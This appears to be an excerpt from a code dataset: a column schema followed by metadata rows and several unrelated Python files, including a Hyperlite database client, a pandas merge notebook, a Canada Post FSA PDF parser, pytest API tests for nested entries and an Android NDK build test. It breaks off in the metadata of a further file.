repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d-Gaurav/hyperlite-client | 10,599,979,295,112 | 0562da47e326d8427b1117eed5524852f0b76f25 | 9c49f14a80181c6c3038e60b6058239af9d6d408 | /hyperlite/collection.py | 40bd4bf07d10217679e953c881830d608ebea33c | [
"MIT"
]
| permissive | https://github.com/d-Gaurav/hyperlite-client | 6ae1ee617079c12e517840b92f3682f5ad2619af | d181fdbf20d87016b8a3becffc97acd6d725f049 | refs/heads/master | 2021-10-22T13:41:11.334533 | 2019-03-11T07:06:24 | 2019-03-11T07:06:24 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
from .object import Object
from .cursor import Cursor
from .event import Event
from . import generateReadRequestSchema, generateReadByIdRequestSchema, generateReadOneRequestSchema, generateInsertRequestSchema, generateDeleteRequestSchema, generateUpdateRequestSchema, generateUpdateRequestSchema, generateInsertAllRequestSchema
from . import DATABASE
class Collection(object):
def __init__(self, name: str):
self.name = name
self.objects: Cursor
def insert(self, obj):
insertSchema = generateInsertRequestSchema()
insertSchema["Insert"]["data"] = obj
insertSchema["Insert"]["meta"]["Database"] = DATABASE
insertSchema["Insert"]["meta"]["Collection"] = self.name
Event.emmit('request', json.dumps(insertSchema))
def execHyperQl(self, query):
readSchema = generateReadRequestSchema()
readSchema["Read"]["meta"]["Query"] = query
readSchema["Read"]["meta"]["Database"] = DATABASE
readSchema["Read"]["meta"]["Collection"] = self.name
Event.emmit('request', json.dumps(readSchema))
def readAll(self):
readSchema = generateReadRequestSchema()
readSchema["Read"]["meta"]["Query"] = "*"
readSchema["Read"]["meta"]["Database"] = DATABASE
readSchema["Read"]["meta"]["Collection"] = self.name
Event.emmit('request', json.dumps(readSchema))
def readOne(self, query="*"):
readSchema = generateReadOneRequestSchema()
readSchema["ReadOne"]["meta"]["Query"] = query
readSchema["ReadOne"]["meta"]["Database"] = DATABASE
readSchema["ReadOne"]["meta"]["Collection"] = self.name
Event.emmit('request', json.dumps(readSchema))
def readById(self, objectId: str):
readSchema = generateReadByIdRequestSchema()
readSchema["ReadById"]["meta"]["Database"] = DATABASE
readSchema["ReadById"]["meta"]["Collection"] = self.name
readSchema["ReadById"]["meta"]["id"] = objectId
Event.emmit('request', json.dumps(readSchema))
def populate(self, obj: dict):
if 'fieldRef' not in obj:
raise ValueError("'from' is required")
if 'to' not in obj:
raise ValueError("'to' is required")
obj.update({'type': 'Pipeline', 'Database': DATABASE, 'Collection': self.name})
Event.emmit('request', json.dumps(obj))
def update(self, obj: dict, query="*"):
updateSchema = generateUpdateRequestSchema()
updateSchema["Update"]["data"] = obj
updateSchema["Update"]["meta"]["Database"] = DATABASE
updateSchema["Update"]["meta"]["Collection"] = self.name
updateSchema["Update"]["meta"]["Query"] = query
Event.emmit('request', json.dumps(updateSchema))
def delete(self, obj_id: str):
deleteSchema = generateDeleteRequestSchema()
deleteSchema["Delete"]["meta"]["Database"] = DATABASE
deleteSchema["Delete"]["meta"]["Collection"] = self.name
deleteSchema["Delete"]["meta"]["Object_Id"] = obj_id
Event.emmit('request', json.dumps(deleteSchema))
def insertAll(self, objects: list):
isValid = False
if type(objects) is list:
for hy_object in objects:
if type(hy_object) is dict:
isValid = True
else:
isValid = False
break
if isValid:
insertAllSchema = generateInsertAllRequestSchema()
insertAllSchema["InsertAll"]["data"] = objects
insertAllSchema["InsertAll"]["meta"]["Database"] = DATABASE
insertAllSchema["InsertAll"]["meta"]["Collection"] = self.name
Event.emmit('request', json.dumps(insertAllSchema))
else:
raise ValueError("Invalid data for Insertion.") | UTF-8 | Python | false | false | 3,836 | py | 5 | collection.py | 4 | 0.625391 | 0.625391 | 0 | 89 | 42.11236 | 248 |
SiriusKoan/repair_system | 6,983,616,867,103 | fe2603e30d67fc7200ea64e9840fce8ab151ab38 | cf01c2b96d5f89ea6fa2ccb02ab5d8128c84e914 | /src/app/database/__init__.py | 771059365b71b1191c20b6fcc0e1f53e97d9c9f3 | [
"MIT"
]
| permissive | https://github.com/SiriusKoan/repair_system | 9db0b6acffaacecc2b4a1f63d533408991e86f27 | 6524e7a8d5954b6e16b34b9d88db9d455ef3dd1d | refs/heads/main | 2023-08-11T11:47:17.788208 | 2021-09-26T05:49:48 | 2021-09-26T05:49:48 | 358,261,629 | 1 | 0 | null | true | 2021-04-15T13:03:36 | 2021-04-15T13:03:36 | 2021-04-15T13:03:34 | 2021-04-15T13:03:31 | 0 | 0 | 0 | 0 | null | false | false | from . import backup_helper, db_helper
from .common import cache
from .model import db
__all__ = [db, backup_helper, db_helper, cache]
| UTF-8 | Python | false | false | 136 | py | 62 | __init__.py | 40 | 0.720588 | 0.720588 | 0 | 5 | 26.2 | 47 |
ergo/testscaffold | 11,974,368,829,247 | d1f7ef79875564f761df1ed1f342a262fb004cff | 5247672ce237e6da717bb37ed1223ee990b853ca | /backend/testscaffold/tests/functional/test_entries_api.py | 9f0a1387460326d2108aeee9f43a5cd4f78b3b41 | []
| no_license | https://github.com/ergo/testscaffold | df29ff27efa585411335388aa1a75dd4fc5d2220 | 4fb044ed57be955856eebcfe00874528b1efd03d | refs/heads/master | 2022-12-11T08:48:52.185780 | 2021-04-25T23:12:33 | 2021-04-25T23:12:33 | 62,617,583 | 9 | 4 | null | false | 2022-12-08T08:17:54 | 2016-07-05T08:02:54 | 2022-09-01T04:49:53 | 2022-12-08T08:17:54 | 369 | 7 | 3 | 9 | Python | false | false | import pprint
import pytest
from testscaffold.tests.utils import create_entry, session_context, create_admin
def create_default_tree(db_session):
root = create_entry({"resource_id": -1, "resource_name": "root a", "ordering": 1}, sqla_session=db_session,)
res_a = create_entry(
{"resource_id": 1, "resource_name": "a", "ordering": 1, "parent_id": root.resource_id,},
sqla_session=db_session,
)
res_aa = create_entry(
{"resource_id": 5, "resource_name": "aa", "ordering": 1, "parent_id": res_a.resource_id,},
sqla_session=db_session,
)
res_ab = create_entry(
{"resource_id": 6, "resource_name": "ab", "ordering": 2, "parent_id": res_a.resource_id,},
sqla_session=db_session,
)
res_ac = create_entry(
{"resource_id": 7, "resource_name": "ac", "ordering": 3, "parent_id": res_a.resource_id,},
sqla_session=db_session,
)
res_aca = create_entry(
{"resource_id": 9, "resource_name": "aca", "ordering": 1, "parent_id": res_ac.resource_id,},
sqla_session=db_session,
)
res_acaa = create_entry(
{"resource_id": 12, "resource_name": "aca", "ordering": 1, "parent_id": res_aca.resource_id,},
sqla_session=db_session,
)
res_ad = create_entry(
{"resource_id": 8, "resource_name": "ad", "ordering": 4, "parent_id": res_a.resource_id,},
sqla_session=db_session,
)
res_b = create_entry(
{"resource_id": 2, "resource_name": "b", "ordering": 2, "parent_id": root.resource_id,},
sqla_session=db_session,
)
res_ba = create_entry(
{"resource_id": 4, "resource_name": "ba", "ordering": 1, "parent_id": res_b.resource_id,},
sqla_session=db_session,
)
res_c = create_entry(
{"resource_id": 3, "resource_name": "c", "ordering": 3, "parent_id": root.resource_id,},
sqla_session=db_session,
)
res_d = create_entry(
{"resource_id": 10, "resource_name": "d", "ordering": 4, "parent_id": root.resource_id,},
sqla_session=db_session,
)
res_e = create_entry(
{"resource_id": 11, "resource_name": "e", "ordering": 5, "parent_id": root.resource_id,},
sqla_session=db_session,
)
root_b = create_entry({"resource_id": -2, "resource_name": "root b", "ordering": 2}, sqla_session=db_session,)
root_c = create_entry({"resource_id": -3, "resource_name": "root 3", "ordering": 3}, sqla_session=db_session,)
return [root, root_b, root_c]
@pytest.mark.usefixtures("full_app", "with_migrations", "clean_tables", "sqla_session")
class TestFunctionalAPIEntries:
def test_wrong_token(self, full_app):
url_path = "/api/0.1/entries"
headers = {str("x-testscaffold-auth-token"): str("test")}
full_app.post(url_path, {}, status=403, headers=headers)
def test_entries_list(self, full_app, sqla_session):
with session_context(sqla_session) as session:
admin, token = create_admin(session)
for x in range(1, 51):
create_entry(
{"resource_name": "entry-x{}".format(x), "note": "x{}".format(x)}, sqla_session=session,
)
create_entry(
{"resource_name": "entry-y{}".format(x), "note": "y{}".format(x)}, sqla_session=session,
)
url_path = "/api/0.1/entries"
headers = {str("x-testscaffold-auth-token"): str(token)}
response = full_app.get(url_path, status=200, headers=headers)
items = response.json
assert len(items) == 50
assert items[0]["resource_name"] == "entry-x1"
assert items[49]["resource_name"] == "entry-y25"
assert response.headers["x-pages"] == "2"
assert response.headers["x-current-page"] == "1"
assert response.headers["x-total-count"] == "100"
def test_entry_create_no_json(self, full_app, sqla_session):
with session_context(sqla_session) as session:
admin, token = create_admin(session)
url_path = "/api/0.1/entries"
headers = {str("x-testscaffold-auth-token"): str(token)}
full_app.post_json(url_path, status=422, headers=headers)
@pytest.mark.parametrize(
"test_input, error_keys",
[
({}, ["resource_name"]),
({"parent_id": "v"}, ["resource_name", "parent_id"]),
({"ordering": 5, "resource_name": "x"}, ["ordering"]),
({"parent_id": 5}, ["resource_name", "parent_id"]),
],
)
def test_entry_create_bad_json(self, full_app, sqla_session, test_input, error_keys):
with session_context(sqla_session) as session:
admin, token = create_admin(session)
url_path = "/api/0.1/entries"
headers = {str("x-testscaffold-auth-token"): str(token)}
response = full_app.post_json(url_path, test_input, status=422, headers=headers)
assert sorted(error_keys) == sorted(response.json.keys())
def test_entry_create(self, full_app, sqla_session):
with session_context(sqla_session) as session:
admin, token = create_admin(session)
url_path = "/api/0.1/entries"
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {
"id": -9999,
"resource_name": "some-new-entry",
"note": "text",
"ordering": 1,
}
response = full_app.post_json(url_path, entry_dict, status=200, headers=headers)
assert response.json["owner_user_id"] == admin.id
assert response.json["resource_id"] > 0
assert response.json["ordering"] == 1
assert entry_dict["resource_name"] == response.json["resource_name"]
assert entry_dict["note"] == response.json["note"]
def test_entry_patch(self, full_app, sqla_session):
with session_context(sqla_session) as session:
admin, token = create_admin(session)
entry = create_entry({"resource_name": "entry-x", "note": "x"}, sqla_session=session)
url_path = "/api/0.1/entries/{}".format(entry.resource_id)
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {"resource_id": -9, "resource_name": "CHANGED", "note": "CHANGED"}
response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
assert response.json["resource_id"] == entry.resource_id
assert entry_dict["resource_name"] == response.json["resource_name"]
assert entry_dict["note"] == response.json["note"]
def test_entry_delete(self, full_app, sqla_session):
from testscaffold.services.resource_tree_service import tree_service
with session_context(sqla_session) as session:
admin, token = create_admin(session)
entry = create_entry({"resource_name": "entry-x", "note": "x"}, sqla_session=session)
url_path = "/api/0.1/entries/{}".format(entry.resource_id)
headers = {str("x-testscaffold-auth-token"): str(token)}
full_app.delete_json(url_path, status=200, headers=headers)
result = tree_service.from_parent_deeper(None, db_session=sqla_session)
assert len(result.all()) == 0
def test_entry_delete_branch(self, full_app, sqla_session):
from testscaffold.services.resource_tree_service import tree_service
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries/{}".format(1)
headers = {str("x-testscaffold-auth-token"): str(token)}
full_app.delete_json(url_path, status=200, headers=headers)
result = tree_service.from_parent_deeper(None, db_session=sqla_session)
row_ids = [r.Resource.resource_id for r in result]
ordering = [r.Resource.ordering for r in result]
assert row_ids == [-1, 2, 4, 3, 10, 11, -2, -3]
assert ordering == [1, 1, 1, 2, 3, 4, 2, 3]
def test_root_nesting(self, full_app, sqla_session):
from testscaffold.services.resource_tree_service import tree_service
root = create_default_tree(sqla_session)[0]
result = tree_service.from_resource_deeper(root.resource_id, db_session=sqla_session)
tree_struct = tree_service.build_subtree_strut(result)["children"][-1]
pprint.pprint(tree_struct)
assert tree_struct["node"].resource_id == -1
l1_nodes = [n for n in tree_struct["children"].values()]
a_node = tree_struct["children"][1]
b_node = tree_struct["children"][2]
ac_node = a_node["children"][7]
l_a_nodes = [n for n in a_node["children"].values()]
l_b_nodes = [n for n in b_node["children"].values()]
l_ac_nodes = [n for n in ac_node["children"].values()]
assert [n["node"].resource_id for n in l1_nodes] == [1, 2, 3, 10, 11]
assert [n["node"].resource_id for n in l_a_nodes] == [5, 6, 7, 8]
assert [n["node"].resource_id for n in l_b_nodes] == [4]
assert [n["node"].resource_id for n in l_ac_nodes] == [9]
def test_root_entry_no_parent_no_order(self, full_app, sqla_session):
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries"
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {"id": -9999, "resource_name": "some-new-entry", "note": "text"}
response = full_app.post_json(url_path, entry_dict, status=200, headers=headers)
from testscaffold.services.resource_tree_service import tree_service
result = tree_service.from_parent_deeper(None, db_session=sqla_session, limit_depth=1)
tree_struct = tree_service.build_subtree_strut(result)["children"]
pprint.pprint(tree_struct)
assert response.json["resource_id"] > 0
assert response.json["ordering"] == 4
new_id = response.json["resource_id"]
assert [i for i in tree_struct.keys()] == [-1, -2, -3, new_id]
def test_root_entry_no_parent_middle(self, full_app, sqla_session):
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries"
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {
"id": -9999,
"resource_name": "some-new-entry",
"note": "text",
"ordering": 2,
}
response = full_app.post_json(url_path, entry_dict, status=200, headers=headers)
from testscaffold.services.resource_tree_service import tree_service
result = tree_service.from_parent_deeper(None, db_session=sqla_session, limit_depth=1)
tree_struct = tree_service.build_subtree_strut(result)["children"]
pprint.pprint(tree_struct)
assert response.json["resource_id"] > 0
assert response.json["ordering"] == 2
new_id = response.json["resource_id"]
assert [i for i in tree_struct.keys()] == [-1, new_id, -2, -3]
def test_root_entry_no_parent_last(self, full_app, sqla_session):
from testscaffold.services.resource_tree_service import tree_service
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries"
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {
"id": -9999,
"resource_name": "some-new-entry",
"note": "text",
"ordering": 4,
}
response = full_app.post_json(url_path, entry_dict, status=200, headers=headers)
result = tree_service.from_parent_deeper(None, db_session=sqla_session, limit_depth=1)
tree_struct = tree_service.build_subtree_strut(result)["children"]
assert response.json["resource_id"] > 0
assert response.json["ordering"] == 4
new_id = response.json["resource_id"]
assert [i for i in tree_struct.keys()] == [-1, -2, -3, new_id]
@pytest.mark.parametrize("ordering, expected", [(5, "4"), (0, "1"), (-1, "1")])
def test_root_entry_no_parent_wrong_order(self, full_app, sqla_session, ordering, expected):
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries"
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {
"id": -9999,
"resource_name": "some-new-entry",
"note": "text",
"ordering": ordering,
}
response = full_app.post_json(url_path, entry_dict, status=422, headers=headers)
print(response.text)
assert expected in response.json["ordering"][0]
def test_entry_create_parent_no_order(self, full_app, sqla_session):
from testscaffold.services.resource_tree_service import tree_service
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries"
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {
"id": -9999,
"resource_name": "some-new-entry",
"note": "text",
"parent_id": 1,
}
response = full_app.post_json(url_path, entry_dict, status=200, headers=headers)
result = tree_service.from_parent_deeper(1, db_session=sqla_session, limit_depth=1)
tree_struct = tree_service.build_subtree_strut(result)["children"]
pprint.pprint(tree_struct)
assert response.json["resource_id"] > 0
assert response.json["ordering"] == 5
new_id = response.json["resource_id"]
assert [i for i in tree_struct.keys()] == [5, 6, 7, 8, new_id]
def test_entry_patch_same_parent(self, full_app, sqla_session):
from testscaffold.services.resource_tree_service import tree_service
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries/{}".format(1)
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {"parent_id": -1}
response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
result = tree_service.from_parent_deeper(None, db_session=sqla_session)
tree_struct = tree_service.build_subtree_strut(result)["children"]
pprint.pprint(tree_struct)
assert response.json["ordering"] == 1
def test_entry_patch_order_same_branch(self, full_app, sqla_session):
from testscaffold.services.resource_tree_service import tree_service
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries/{}".format(-2)
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {"ordering": 3}
response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
result = tree_service.from_parent_deeper(None, db_session=sqla_session)
tree_struct = tree_service.build_subtree_strut(result)["children"]
pprint.pprint(tree_struct)
assert response.json["ordering"] == 3
assert [i for i in tree_struct.keys()] == [-1, -3, -2]
assert [i["node"].ordering for i in tree_struct.values()] == [1, 2, 3]
@pytest.mark.parametrize(
"node_id, position, ordered_elems",
[(6, 3, [5, 7, 6, 8]), (6, 1, [6, 5, 7, 8]), (6, 2, [5, 6, 7, 8]), (6, 4, [5, 7, 8, 6]),],
)
def test_entry_patch_order_same_branch_nested(self, full_app, sqla_session, node_id, position, ordered_elems):
from testscaffold.services.resource_tree_service import tree_service
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries/{}".format(node_id)
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {"ordering": position}
response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
result = tree_service.from_parent_deeper(1, db_session=sqla_session)
tree_struct = tree_service.build_subtree_strut(result)["children"]
pprint.pprint(tree_struct)
assert response.json["ordering"] == position
assert [i for i in tree_struct.keys()] == ordered_elems
assert [i["node"].ordering for i in tree_struct.values()] == [1, 2, 3, 4]
@pytest.mark.parametrize(
"node_id, position, ordered_elems",
[(12, 3, [5, 6, 12, 7, 8]), (12, 1, [12, 5, 6, 7, 8]), (12, 2, [5, 12, 6, 7, 8]), (12, 5, [5, 6, 7, 8, 12]),],
)
def test_entry_patch_order_upper_branch_nested(self, full_app, sqla_session, node_id, position, ordered_elems):
from testscaffold.services.resource_tree_service import tree_service
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries/{}".format(node_id)
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {"ordering": position, "parent_id": 1}
response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
result = tree_service.from_parent_deeper(1, db_session=sqla_session)
tree_struct = tree_service.build_subtree_strut(result)["children"]
pprint.pprint(tree_struct)
assert response.json["ordering"] == position
assert [i for i in tree_struct.keys()] == ordered_elems
assert [i["node"].ordering for i in tree_struct.values()] == [1, 2, 3, 4, 5]
def test_entry_patch_order_upper_branch_no_order(self, full_app, sqla_session):
from testscaffold.services.resource_tree_service import tree_service
with session_context(sqla_session) as session:
admin, token = create_admin(session)
create_default_tree(db_session=sqla_session)
url_path = "/api/0.1/entries/{}".format(12)
headers = {str("x-testscaffold-auth-token"): str(token)}
entry_dict = {"parent_id": 1}
response = full_app.patch_json(url_path, entry_dict, status=200, headers=headers)
result = tree_service.from_parent_deeper(1, db_session=sqla_session)
tree_struct = tree_service.build_subtree_strut(result)["children"]
pprint.pprint(tree_struct)
assert response.json["ordering"] == 5
assert [i for i in tree_struct.keys()] == [5, 6, 7, 8, 12]
assert [i["node"].ordering for i in tree_struct.values()] == [1, 2, 3, 4, 5]
| UTF-8 | Python | false | false | 19,194 | py | 105 | test_entries_api.py | 66 | 0.606648 | 0.588569 | 0 | 403 | 46.627792 | 118 |
uiandwe/TIL | 18,674,517,807,160 | 171d3f0cbef5d104c876dd12a9a50988a58acd3f | ba80ca143ba35fd481730786a27ebdb1f88ce835 | /Machine_Running/10minutesToPandas/merge.py | 6a2f2fa512f84036e8dcda14737fe915ee04fab4 | []
| no_license | https://github.com/uiandwe/TIL | c541020b65adc53578aeb1c3ba4c6770b3b2e8b3 | 186544469374dd0279099c6c6aa7555ee23e42fe | refs/heads/master | 2022-02-15T08:33:07.270573 | 2022-01-01T15:22:54 | 2022-01-01T15:22:54 | 63,420,931 | 2 | 4 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
# In[4]:
adf = pd.DataFrame({"x1": ["A", "B", "C"], "x2": [1, 2, 3]})
adf
# In[7]:
bdf = pd.DataFrame({"x1": ["A", "B", "D"], "x3": ["T", "F", "T"]})
bdf
# In[8]:
pd.merge(adf, bdf, how='left', on='x1')
# In[9]:
pd.merge(bdf, adf, how='left', on='x1')
# In[10]:
pd.merge(adf, bdf, how='right', on='x1')
# In[11]:
pd.merge(adf, bdf, how='inner', on='x1')
# In[12]:
pd.merge(adf, bdf, how='outer', on='x1')
# In[14]:
adf.x1.isin(bdf.x1)
# In[15]:
adf[adf.x1.isin(bdf.x1)]
# In[16]:
~adf.x1.isin(bdf.x1)
# In[17]:
adf[~adf.x1.isin(bdf.x1)]
# In[ ]:
| UTF-8 | Python | false | false | 666 | py | 1,288 | merge.py | 877 | 0.487988 | 0.427928 | 0 | 78 | 7.487179 | 66 |
rahulgoel97/CanadaFSAParser | 3,152,506,004,241 | 5e586005645c135283077916d16571a5b10d0d2b | 91245972275d1d93a0b792c723c0bcae3c77bcef | /canada_fsa_parser.py | 6a076fe33a8804a8360f10e9f6bbdae89c65969b | [
"MIT"
]
| permissive | https://github.com/rahulgoel97/CanadaFSAParser | c4aca77da07e34491b0c7526a537e291e90b4cb9 | 386a2eb1d563f210ecb3fb9c9149eedb64f52e2a | refs/heads/main | 2023-03-02T04:10:13.946324 | 2021-01-26T22:40:04 | 2021-01-26T22:40:04 | 333,233,771 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
- Canadian FSA (Forward Sortation Area) parser
- Use Canada Post's listing to parse FSAs and Areas into a pandas dataframe and JSON format
- Example: https://www.canadapost.ca/assets/pdf/KB/nps/nps_nonlettermail_fsalist_jan2019.pdf (Jan 2019)
- Download the PDF on your computer, and use directory as input
'''
# Import dependencies
import PyPDF2
import re
import pandas as pd
import json
# Get the directory
file_location=input("Please enter the directory: ")
# Parse the file
def parse_pages(pdfReader):
"""
Loops over all the pages from the Canada Post document, and returns parsed data
"""
fullList = []
### Get number of paged
numPages = pdfReader.numPages
### Loop over pages
for page in range(0, numPages):
# Create page object
pageObj = pdfReader.getPage(page)
# Extract text
text = pageObj.extractText()
# Parse data
parsedData = parse_page(text)
# Build data
fullList.append(parsedData)
# Initialize the lists
fsa_name_list = []
fsa_desc_list = []
# To count FSAs and ensure totals are 1.6K, initialize to 1
counter = 1
# Iterate over the fullList
for value in fullList:
for idx, subvalue in enumerate(value):
# Extract the tokens
fsa = subvalue[0]
fsa_desc = subvalue[1:len(subvalue)]
# Join tokens into a sentence
fsa_desc_clean = ' '.join(fsa_desc)
# Build the lists
fsa_name_list.append(fsa)
fsa_desc_list.append(fsa_desc_clean)
# Incremenet
counter+=1
### Build the table
df = pd.DataFrame()
df['FSA'] = fsa_name_list
df['Area'] = fsa_desc_list
### Return dataframe
return df
def parse_page(strings):
"""
Input: Takes in a string of Canada Post's listing of Forward Sortation Areas
Output: Parsed FSA name and location in a large list
"""
### Use RegEx to identify the FSAs
fsa_vals = re.findall(r'([A-Z][0-9][A-Z$])', strings)
### Split up the input into tokens, separated by a space
tokens = strings.split()
# List to capture the indices of identified FSAs in fsa_vals
location_list = []
# Loop over all the FSA-values & append to list
for fsa in fsa_vals:
for idx, token in enumerate(tokens):
if(token==fsa):
location_list.append(idx)
### Construct the FSA list
#List of lists for FSAs
fsa_full_list=[]
# Loop over the indices of identified FSAs
for idx_value in range(len(location_list)):
# Temporary list to capture data for each individual FSA
fsa_temp_list=[]
# For all FSAs...
try:
for i in range(location_list[idx_value], location_list[idx_value+1]):
# Add the data to the temporary list
fsa_temp_list.append(tokens[i])
# Except the last FSA...
except:
# Create variable to capture the "last index" to capture
last_index = 0
# The last index occurs before the "(+) ADDITION" descriptor in tokens
for idx, token in enumerate(tokens):
if(token=='(+)' and tokens[idx+1]=='ADDITION'):
last_index=idx # This is the last index
# Now, use the last index to capture the last FSA's data
for i in range(location_list[len(location_list)-1], last_index):
fsa_temp_list.append(tokens[i])
# Finally, append to the large list, to create a list of lists
fsa_full_list.append(fsa_temp_list)
### Return the list of lists
return fsa_full_list
def getFSAValues(file_location):
# Open File
pdfFileObj = open(file_location, 'rb')
# creating a pdf reader object
pdfReader = PyPDF2.PdfFileReader(pdfFileObj)
# Parse the pdf
df = parse_pages(pdfReader)
# Convert to JSON
fsa_json = json.loads(df.to_json())
# Return dataframe and json file
return df, fsa_json
print("...Parsing the data")
try:
dfvals, jsonvals = getFSAValues(file_location)
print("...Success!")
while(True):
response = input("Do you want to save into Excel? (Y/n)")
if(response=='Y' or response=='y'):
dfvals.to_excel('FSA_Values.xlsx')
print("...Saved into Excel file")
break
elif(response=='N' or response=='n'):
break
else:
print("Please enter a valid response")
pass
while(True):
response = input("Do you want to save into JSON format? (Y/n)")
if(response=='Y' or response=='y'):
with open('FSA_vals.txt', 'w') as outfile:
json.dump(jsonvals, outfile)
print("...Saved into TXT file")
break
elif(response=='N' or response=='n'):
break
else:
print("Please enter a valid response")
pass
except:
print(f"Unknown error...")
| UTF-8 | Python | false | false | 5,328 | py | 3 | canada_fsa_parser.py | 1 | 0.560998 | 0.556494 | 0 | 189 | 26.169312 | 103 |
wimal-build/ndk | 9,234,179,727,855 | 76ffa8dd2cd0fc48a315702308b3bb721f2a0472 | 729e104ff6831343caf7e1afd8014232b35b8c26 | /tests/build/wrap_sh_none/test.py | c6ea862cd2124db575f42d813bd830bb213fd169 | [
"Apache-2.0"
]
| permissive | https://github.com/wimal-build/ndk | b8d77657b0e8b39f0da3fe2cc4f2aa52a00e5d7b | 82dbb8b7a26a1bb7a6fa8c2aa1ad7c431c1e626a | refs/heads/master | 2020-04-24T14:01:12.132020 | 2020-03-26T15:44:41 | 2020-03-26T15:44:41 | 172,006,630 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Check for correct link order from ndk-build.
"""
import os
import subprocess
import sys
def run_test(ndk_path, abi, platform, linker, build_flags):
"""Checks that the proper wrap.sh scripts were installed."""
ndk_build = os.path.join(ndk_path, 'ndk-build')
if sys.platform == 'win32':
ndk_build += '.cmd'
project_path = 'project'
ndk_args = build_flags + [
f'APP_ABI={abi}',
f'APP_LD={linker.value}',
f'APP_PLATFORM=android-{platform}',
]
proc = subprocess.Popen([ndk_build, '-C', project_path] + ndk_args,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate()
out = out.decode('utf-8')
if proc.returncode != 0:
return proc.returncode == 0, out
wrap_sh = os.path.join(project_path, 'libs', abi, 'wrap.sh')
if os.path.exists(wrap_sh):
return False, '{} should not exist'.format(wrap_sh)
return True, ''
| UTF-8 | Python | false | false | 1,564 | py | 239 | test.py | 137 | 0.662404 | 0.654092 | 0 | 44 | 34.545455 | 77 |
smartaleciam/playcard | 6,459,630,846,683 | d2fee26460dd9185281bd3976bde2ebcb40f8afb | 7e6790a59b4cfe2d31c2c65dfc86202e5b634506 | /html/scripts/clear_lcd.py | e86397ff724a4e85381db0fc6f02a80b4b504881 | []
